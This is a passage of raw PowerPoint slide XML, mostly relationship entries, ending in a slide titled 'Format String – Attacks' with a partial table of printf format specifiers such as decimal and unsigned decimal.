Target="../tags/tag552.xml"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag573.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag429.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag519.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag584.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag605.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag640.xml"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag661.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag446.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag467.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag488.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag542.xml"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag563.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag509.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag574.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag595.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag616.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag630.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag651.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag436.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag457.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag532.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag553.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag478.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag499.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag520.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag564.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag585.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag606.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag641.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag430.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag662.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag447.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag543.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag468.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag489.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag510.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag554.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag575.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag596.xml"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag617.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag631.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag652.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag437.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag533.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag458.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag479.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag500.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag521.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag544.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag565.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag431.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag586.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag607.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag642.xml"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag663.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag448.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag469.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag490.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag511.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag534.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag555.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag576.xml"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag597.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag618.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag632.xml"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag653.xml"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag664.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag438.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag459.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag480.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag501.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag524.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag432.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag522.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag545.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag566.xml"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag587.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag608.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag643.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag654.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag449.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag470.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag491.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag512.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag535.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag556.xml"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag577.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag598.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag619.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag633.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag644.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag665.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag439.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag460.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag481.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag434.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag455.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag476.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag497.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag502.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag518.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag523.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag525.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag546.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag567.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag572.xml"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag588.xml"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag593.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag609.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag428.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag433.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag604.xml"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag634.xml"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag639.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag660.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag450.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag655.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag471.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag492.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag513.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag536.xml"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag557.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag578.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag599.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag620.xml"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag624.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag440.xml"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag645.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag666.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag461.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag482.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag503.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag526.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag547.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag568.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag514.xml"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag589.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag610.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag635.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag656.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag451.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag472.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag493.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag537.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag558.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag504.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag579.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag600.xml"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag621.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag625.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag646.xml"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag667.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag441.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag462.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag483.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag527.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag548.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag494.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag515.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag569.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag590.xml"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag611.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag425.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag636.xml"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag657.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag452.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag473.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag538.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag484.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag505.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag559.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag580.xml"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag601.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag622.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag626.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag647.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag668.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag442.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag463.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag474.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag528.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag549.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag570.xml"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag591.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag612.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag495.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag516.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag637.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag658.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag426.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag453.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag464.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag539.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag560.xml"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag581.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag602.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag485.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag506.xml"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag623.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag627.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag443.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag648.xml"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag454.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag529.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag550.xml"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag571.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag592.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag475.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag496.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag517.xml"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag613.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag427.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag638.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag659.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag540.xml"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag561.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag582.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag444.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag465.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag486.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag507.xml"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag603.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag614.xml"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag628.xml"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag649.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag530.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2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2330058" y="1585049"/>
            <a:ext cx="4483920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Format String – Attacks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6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7991-D0D2-46AB-83E2-487CE04D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3AA-528F-4F5A-91E7-4F07DE68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327A-2A67-4B75-BC09-14F5D534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1268B51-267A-4A3F-8D18-837EB56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74353"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="192025" y="1651981"/>
          <a:ext cx="8778240" cy="194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211">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="184010009"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4228543">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4259576484"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1691416">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="201632889"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1595070">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3956171877"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="237569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Specifier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Passed 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42610"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="263965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decimal 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333429"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="343659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decimal (unsigned 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70613"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="343659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 (unsigned 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292331"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
